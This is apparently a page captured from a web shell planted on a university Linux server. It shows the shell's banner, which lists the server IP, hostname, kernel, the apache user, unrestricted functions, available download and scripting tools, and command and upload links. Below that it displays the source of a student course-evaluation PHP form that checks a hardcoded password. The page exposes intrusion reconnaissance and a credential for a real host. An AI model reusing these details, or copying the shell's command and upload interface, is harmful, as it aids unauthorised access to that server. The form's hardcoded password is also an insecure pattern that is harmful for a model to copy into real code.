Server IP : 172.16.15.8 / Your IP : 3.145.108.43 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jlsnowden/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-----Evalform_2.php--------> <?php session_start(); if($_SESSION['psw']== NULL) { $pass=$_POST['pass']; $_SESSION['psw']= $pass; } else { $pass=$_SESSION['psw']; } if($pass !="project") print"Error"; else { ?> <CENTER> <H2> Course Evaluation: </H2> <FORM action=Evalform_2.php method=post> Course Name: <P> <INPUT type=textbox name=course> <P> Gender: <INPUT type=radio name=gender value=Male checked> Male <INPUT type=radio name=gender value=Female>Female <P> Grade: <INPUT type=radio name=grade value=Freshman checked> Freshman <INPUT type=radio name=grade value=Sophmore> Sophmore <INPUT type=radio name=grade value=Junior>Junior <INPUT type=radio name=grade value=Senior>Senior <P> 1)How would you rate the instructors willness to awnser questions? <P> <INPUT type=radio name=q1 value=2 checked> Good <P> <INPUT type=radio name=q1 value=1>Average <P> <INPUT type=radio name=q1 value=0>Poor <P> <P> 2)How would you rate the amount of homework given for this course? <P> <INPUT type=radio name=q2 value=2 checked> Good <P> <INPUT type=radio name=q2 value=1>Average <P> <INPUT type=radio name=q2 value=0>Poor <P> 3)How would you rate your overall enjoyment of the course? <P> <INPUT type=radio name=q3 value=2 checked> Good <P> <INPUT type=radio name=q3 value=1>Average <P> <INPUT type=radio name=q3 value=0>Poor <P> <INPUT type=submit value="Submit"> <INPUT type=reset value="Reset"> </FORM> </CENTER> <A HREF=Eval_2.php> Go Back To Welcome Page</A> <?php } ?>